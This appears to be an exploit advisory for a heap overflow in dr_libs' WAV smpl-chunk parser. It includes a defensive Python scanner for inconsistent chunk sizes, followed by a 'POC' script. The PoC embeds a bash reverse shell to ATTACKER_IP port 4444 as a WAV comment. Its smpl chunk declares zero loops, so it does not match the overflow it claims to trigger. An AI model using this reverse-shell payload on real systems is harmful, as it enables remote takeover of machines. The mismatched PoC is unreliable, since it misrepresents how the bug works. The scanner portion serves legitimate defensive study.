=============================================================================================================================================
| # Title : dr_libs ≤ 0.14.4 via crafted WAV smpl chunk Heap Buffer Overflow |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://github.com/mackron/dr_libs/ |
=============================================================================================================================================
[+] Summary : A heap buffer overflow exists in the function drwav__read_smpl_to_metadata_obj() when a WAV file containing a crafted smpl chunk is processed.
The vulnerability arises from a mismatch between the sampleLoopCount validation performed in pass 1 and the unconditional processing performed in pass 2, which lets 36 bytes of attacker-controlled
data overflow heap allocations through any drwav_init_*_with_metadata() call made on untrusted input.
Affected versions: 0.14.4 and earlier
Fixed in: commit 8a7258c
Impact: Memory corruption, potential arbitrary code execution
Trigger: WAV files with manipulated smpl chunk metadata
Mitigation: Update dr_libs to a version newer than 0.14.4.
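The advisory's root cause is a metadata reader that trusts the smpl chunk's declared counts without checking them against the chunk's actual size. The following checker is an added example written for this page; it is not dr_libs code and not the author's PoC. It parses the top-level RIFF chunks of a WAV buffer and applies the structural invariant a safe smpl reader must enforce: the 36-byte fixed header plus sampleLoopCount * 24 bytes of loop records plus samplerData bytes must fit inside the chunk. The field layout and sizes follow the standard smpl chunk definition; the function names, the sample WAV builder and the two sample smpl payloads are constructed for this example.

```python
import struct

SMPL_HEADER_SIZE = 36  # nine little-endian uint32 fields precede the loop table
SMPL_LOOP_SIZE = 24    # each sample loop record is six uint32 fields


def iter_riff_chunks(data):
    """Yield (chunk_id, payload) for every top-level chunk of a RIFF/WAVE buffer.

    Raises ValueError when the container header is wrong or a chunk's declared
    size runs past the end of the buffer (a truncated or over-declared chunk).
    """
    if len(data) < 12 or data[:4] != b'RIFF' or data[8:12] != b'WAVE':
        raise ValueError("not a RIFF/WAVE file")
    pos = 12
    while pos + 8 <= len(data):
        chunk_id = data[pos:pos + 4]
        size = struct.unpack_from('<I', data, pos + 4)[0]
        start = pos + 8
        if start + size > len(data):
            raise ValueError(
                f"chunk {chunk_id!r} declares {size} bytes but only "
                f"{len(data) - start} remain")
        yield chunk_id, data[start:start + size]
        pos = start + size + (size & 1)  # RIFF chunks are word aligned


def check_smpl_chunk(payload):
    """Return a list of findings for one smpl chunk payload; empty means consistent.

    This is the invariant a reader must hold before trusting the chunk:
    header + sampleLoopCount * 24 + samplerData must fit in the chunk body.
    """
    findings = []
    if len(payload) < SMPL_HEADER_SIZE:
        findings.append(
            f"smpl chunk is {len(payload)} bytes, shorter than the "
            f"{SMPL_HEADER_SIZE}-byte fixed header")
        return findings
    fields = struct.unpack_from('<9I', payload, 0)
    loop_count, sampler_data = fields[7], fields[8]  # sampleLoopCount, samplerData
    needed = SMPL_HEADER_SIZE + loop_count * SMPL_LOOP_SIZE + sampler_data
    if needed > len(payload):
        findings.append(
            f"smpl declares {loop_count} loops and {sampler_data} bytes of "
            f"sampler data ({needed} bytes needed) but the chunk holds only "
            f"{len(payload)} bytes")
    return findings


def scan_wav(data):
    """Scan a WAV buffer and return all findings; a non-empty list means reject."""
    findings = []
    try:
        for chunk_id, payload in iter_riff_chunks(data):
            if chunk_id == b'smpl':
                findings.extend(check_smpl_chunk(payload))
    except ValueError as exc:
        findings.append(str(exc))
    return findings


def build_wav(smpl_payload, sample_count=8):
    """Constructed minimal 16-bit mono WAV carrying the given smpl payload (test input)."""
    def chunk(cid, body):
        pad = b'\x00' if len(body) & 1 else b''
        return cid + struct.pack('<I', len(body)) + body + pad
    fmt = chunk(b'fmt ', struct.pack('<HHIIHH', 1, 1, 8000, 16000, 2, 16))
    data = chunk(b'data', b'\x00\x00' * sample_count)
    body = b'WAVE' + fmt + data + chunk(b'smpl', smpl_payload)
    return b'RIFF' + struct.pack('<I', len(body)) + body


# Constructed sample inputs: a consistent smpl chunk with one 24-byte loop record,
# and a chunk whose declared sampleLoopCount far exceeds what the chunk contains.
GOOD_SMPL = (struct.pack('<9I', 0, 0, 0, 60, 0, 0, 0, 1, 0)
             + struct.pack('<6I', 0, 0, 0, 100, 0, 0))
BAD_SMPL = struct.pack('<9I', 0, 0, 0, 60, 0, 0, 0, 1000, 0)

if __name__ == '__main__':
    for name, smpl in (('consistent', GOOD_SMPL), ('inconsistent', BAD_SMPL)):
        print(name, scan_wav(build_wav(smpl)) or 'OK')
```

The scanner is meant as a pre-parse gate in front of a metadata-enabled decoder: a file that fails `scan_wav()` is rejected before any `drwav_init_*_with_metadata()`-style call sees it. The same size-versus-count comparison is what the fixed library must perform in both passes, not only in the first.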
[+] POC :
import struct


def pad_even(data):
    # RIFF chunks are word aligned: append one pad byte after an odd-length chunk
    if len(data) % 2:
        data += b'\x00'
    return data


def generate_wav():
    ATTACKER_IP = "192.168.1.5"
    PORT = "4444"
    cmd = f"bash -c 'sh -i >& /dev/tcp/{ATTACKER_IP}/{PORT} 0>&1'\x00"
    cmd_bytes = cmd.encode()

    sample_rate = 44100
    channels = 1
    bits = 16
    # bytes per second and bytes per sample frame (bits converted to bytes)
    byte_rate = sample_rate * channels * bits // 8
    block_align = channels * bits // 8

    # "fmt " chunk: 16-byte PCM format header
    fmt_chunk = (
        b'fmt ' +
        struct.pack('<IHHIIHH',
                    16,           # chunk size
                    1,            # format tag: PCM
                    channels,
                    sample_rate,
                    byte_rate,
                    block_align,
                    bits
                    )
    )

    # smpl chunk: nine uint32 fields (manufacturer, product, samplePeriod,
    # midiUnityNote, midiPitchFraction, smpteFormat, smpteOffset,
    # sampleLoopCount, samplerData) with no loop records following
    payload = struct.pack('<9I', 0, 0, 0, 60, 0, 0, 0, 0, 0)
    smpl_chunk = b'smpl' + struct.pack('<I', len(payload)) + payload
    smpl_chunk = pad_even(smpl_chunk)

    # one second of silent 16-bit mono audio
    audio_data = b'\x00\x00' * 44100
    data_chunk = b'data' + struct.pack('<I', len(audio_data)) + audio_data
    data_chunk = pad_even(data_chunk)

    # LIST/INFO chunk carrying the command string as an ICMT comment
    comment = cmd_bytes
    comment_padded = pad_even(comment)
    info_chunk = b'ICMT' + struct.pack('<I', len(comment)) + comment_padded
    meta_data = b'INFO' + info_chunk
    meta_chunk = b'LIST' + struct.pack('<I', len(meta_data)) + meta_data
    meta_chunk = pad_even(meta_chunk)

    wave_data = b'WAVE' + fmt_chunk + data_chunk + smpl_chunk + meta_chunk
    riff = b'RIFF' + struct.pack('<I', len(wave_data)) + wave_data

    with open("fixed.wav", "wb") as f:
        f.write(riff)
    print("[+] WAV file generated successfully")


generate_wav()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================